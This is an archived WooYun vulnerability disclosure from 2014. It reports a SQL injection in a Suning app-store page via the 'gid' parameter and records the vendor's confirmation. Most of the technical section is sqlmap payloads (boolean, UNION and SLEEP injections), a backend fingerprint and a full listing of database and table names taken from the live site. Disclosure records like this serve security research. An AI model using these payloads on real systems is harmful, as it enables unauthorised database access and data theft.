当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-060063

漏洞标题:苏宁某处SQL注入漏洞#root权限

相关厂商:江苏苏宁易购电子商务有限公司

漏洞作者: U神

提交时间:2014-05-09 17:13

修复时间:2014-06-23 17:14

公开时间:2014-06-23 17:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-09: 细节已通知厂商并且等待厂商处理中
2014-05-09: 厂商已经确认,细节仅向厂商公开
2014-05-19: 细节向核心白帽子及相关领域专家公开
2014-05-29: 细节向普通白帽子公开
2014-06-08: 细节向实习白帽子公开
2014-06-23: 细节向公众公开

简要描述:

苏宁某处SQL注入漏洞#root权限

详细说明:

注入点:

http://app.suning.com/softwarelist.php?gid=4&cid=190


注入参数:gid

1.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: gid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: gid=4 AND 4558=4558&cid=190
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: gid=4 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6274773a,0x574251536c46
71566759,0x3a7566613a), NULL, NULL#&cid=190
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: gid=4 AND SLEEP(5)&cid=190
---
[17:08:16] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.6
back-end DBMS: MySQL 5.0.11
[17:08:16] [INFO] fetching database names
[17:08:16] [WARNING] reflective value(s) found and filtering out
available databases [6]:
[*] information_schema
[*] suning
[*] suning_app_inner
[*] suning_ios
[*] suning_win
[*] test

漏洞证明:

Database: suning
[233 tables]
+--------------------------+
| Permission |
| action |
| activity |
| ad_indexfocus_img |
| ad_indexsoft |
| admin_group |
| admin_module |
| admin_promotion |
| admin_user |
| admin_user_new |
| app_client |
| app_count_app_day |
| app_count_app_hour |
| app_count_detail |
| app_count_device_day |
| app_count_mobile_day |
| app_count_user_day |
| app_device |
| app_imei |
| app_push_apps |
| app_push_log |
| app_software |
| app_sys |
| app_sys_cmd |
| app_temp |
| authorize |
| brand_ext_inner_map |
| brand_external |
| brand_mobile_ext |
| brand_model_map |
| bug_word |
| category |
| category_anzhi |
| category_icon |
| cloud_bootscreen |
| cloud_qrcode_statistics |
| cloud_res |
| ctrl |
| ctrl_copy |
| ctrltype |
| ctrltype_copy |
| department |
| developer |
| developer_appeal |
| developer_msg |
| device_info |
| device_statistics |
| district_day |
| district_hour |
| district_month |
| district_tol |
| district_week |
| down_detail |
| download |
| download_all |
| download_day |
| download_hour |
| download_month |
| download_tol |
| download_week |
| ego_ad_indexfocus_img |
| ego_ad_indexsoft |
| favority |
| feedback |
| feedback_detail |
| friend_links |
| game_ad_indexfocus_img |
| game_ad_indexsoft |
| game_download_all |
| game_download_day |
| game_download_hour |
| game_download_month |
| game_download_tol |
| game_guess |
| game_soft_ranking |
| game_topic |
| game_topic_info |
| group |
| guess |
| h5_category |
| h5_download_day |
| h5_download_hour |
| h5_download_month |
| h5_download_tol |
| h5_maintain_soft |
| h5_soft_tag |
| h5_software |
| h5_tag |
| http_log |
| imei_day |
| imei_hour |
| imei_month |
| imei_tol |
| install_day |
| install_hour |
| install_month |
| install_tol |
| install_week |
| ip_visit |
| keyword |
| list_column |
| log |
| logo_icon |
| manager |
| market |
| market_ad |
| market_cate |
| market_channel |
| market_channel_day |
| market_imei_channel |
| mobile_brand |
| model_drive |
| model_feedback |
| msg |
| msg_forbid |
| news |
| news_app_map |
| news_class |
| news_comment |
| order_soft |
| os_day |
| os_hour |
| os_month |
| os_tol |
| os_week |
| outer_category |
| page_ad_indexfocus_img |
| people_need |
| people_recommend |
| privilege |
| push_id |
| push_software |
| qrcode_channel |
| qrcode_channel_bak |
| qrcode_channel_url |
| qrcode_channel_url_bak |
| quick_entry |
| ratio_day |
| ratio_hour |
| ratio_month |
| ratio_tol |
| ratio_week |
| recommend |
| report |
| role_user |
| score |
| search_day |
| search_keywords |
| search_month |
| search_soft |
| search_soft_bak20140417 |
| search_tol |
| search_week |
| sms_statistics |
| sn_software |
| soft_guess |
| soft_ranking |
| soft_tag |
| soft_ver_log |
| software |
| software_bak20131017 |
| software_copy |
| software_log |
| software_log_copy |
| software_permission |
| software_pool |
| software_safe |
| spread_money |
| spread_operation |
| spread_promotion_goods |
| spread_promotion_setting |
| spread_reward |
| spread_soft_count_day |
| spread_software |
| spread_supplier |
| suit_feedback |
| suit_statistics |
| suit_statistics_day |
| suit_statistics_hour |
| suit_statistics_month |
| suit_version |
| suning_district |
| suning_store |
| suning_user |
| supplier |
| sys_ad |
| sys_ad_stat |
| sys_ad_stat_day |
| sys_brand |
| sys_brand_info |
| sys_cate |
| sys_soft |
| sys_topic |
| sys_topic_info |
| sys_word |
| tag |
| tag_app_map |
| temporary |
| term_district_day |
| term_district_hour |
| term_district_month |
| term_district_tol |
| term_imei |
| term_imei_day |
| term_imei_hour |
| term_imei_month |
| term_imei_tol |
| term_install |
| term_install_old |
| term_install_testlog |
| term_model_day |
| term_model_hour |
| term_model_month |
| term_model_tol |
| term_os_day |
| term_os_hour |
| term_os_month |
| term_os_tol |
| term_ratio_day |
| term_ratio_hour |
| term_ratio_month |
| term_ratio_tol |
| term_stat_by_imei_day |
| term_stat_by_pack |
| term_stat_by_pack_model |
| topic |
| topic_info |
| updatesoft_log |
| verify_reason |
| web |
| web_ad |
| web_notice |
| web_tag |
+--------------------------+

修复方案:

版权声明:转载请注明来源 U神@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-05-09 18:06

厂商回复:

感谢您对苏宁易购的关注,正在安排人员对此漏洞进行修复。

最新状态:

暂无